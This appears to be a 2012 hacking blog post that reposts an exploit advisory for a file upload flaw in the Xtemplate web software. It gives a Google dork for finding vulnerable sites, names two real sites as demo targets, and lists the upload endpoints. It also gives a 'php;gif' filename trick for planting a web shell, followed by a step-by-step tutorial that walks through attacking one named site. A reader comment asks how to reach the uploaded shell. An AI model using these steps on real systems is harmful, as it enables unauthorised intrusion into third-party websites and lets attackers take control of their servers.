UPLOAD SHELL EASILY XTEMPLATE SHELL UPLOAD VULNERABILITY



UPLOAD SHELL EASILY XTEMPLATE SHELL UPLOAD


 VULNERABILITY

A new Xtemplate Shell Upload Vulnerability Was Found On June 4 2012 By Th3-Skywalk3r Who Belongs To Teamgreyhat Team.

##################################################
# Exploit Title: [Xtemplate shell upload]
#Date: 4/6/12
# Author: [Th3-Skywalk3r]
# Email : th3skywalk3r@hotmail.com
# Category:: [ webapps]
# Google dork: [ /xtemplates/eng/]
# Tested on: [Windows 7 & BT5r2 ]
# Demo site: [http://www.deadseashop.co.il/inc/xtemplates/eng/file_edit.php]
[http://www.sealsand.co.il/inc/xtemplates/eng/file_edit.php]
##################################################

[~] P0c [~] :

uploader link : 
http://target.com/inc/xtemplates/eng/ads_gallery_update.php
http://target.com/inc/xtemplates/eng/file_edit.php

Upload Your Shell : php;gif  & Enjoy .

##########################################################
[»] Greetz to :
                     
[ Th3 Dir3ct0rY, Th3 R00t3r, Hunt009s , Er00r-TGH, Z3r0-TGH, ] 
[ Teamgreyhat ]             
[ And all my Freinds And Greyhat hackers]
       
##########################################################


So Lets Move On To Some Screenshots Who Dont Still Understand How To Do This :)
So First Go To www.google.com and search this Google dork: /xtemplates/eng/
You Will Find It Like This :)
So I Take http://www.sealsand.co.il/inc/xtemplates/eng/
Click On Any Vulnerable Link and just edit the link with file_edit.php
I Just Edit The Website Link Like This http://www.sealsand.co.il/inc/xtemplates/eng/file_edit.php
Like This

Now Upload Your Shell in the format : php;gif & Enjoy it !!!
Hope You Enjoyed The Tutorial Please Do Comment If You Have Any Doubt
And I Thanks Once Again The Author Th3-Skywalk3r and The Whole Team

[ Th3 Dir3ct0rY, Th3 R00t3r, Hunt009s , Er00r-TGH, Z3r0-TGH, ] 
[ Teamgreyhat ]             
[ And all my Freinds And Greyhat hackers]


Tags: , , ,


Share your views...

1 Respones to "UPLOAD SHELL EASILY XTEMPLATE SHELL UPLOAD VULNERABILITY"

sheroze said...

after upload the shell! from where we can access to our shell?


20 June 2012 at 07:26

Post a Comment

Subscribe to: Post Comments (Atom)
 

About Me

Unknown
View my complete profile

© 2010 Dorks Night All Rights Reserved Thesis WordPress Theme Converted into Blogger Template by Hack Tutors.info